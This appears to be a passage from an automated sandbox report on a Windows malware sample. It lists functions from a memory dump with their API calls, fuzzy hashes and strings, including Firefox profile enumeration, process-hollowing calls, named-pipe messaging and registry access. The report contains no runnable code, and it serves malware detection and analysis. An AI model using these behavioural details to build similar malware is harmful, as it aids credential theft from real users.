  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5C23, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59 Total matches: 27stringtime
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6C08, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141 Total matches: 19registrysynchronization
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3F95, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80 Total matches: 37memorystring
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
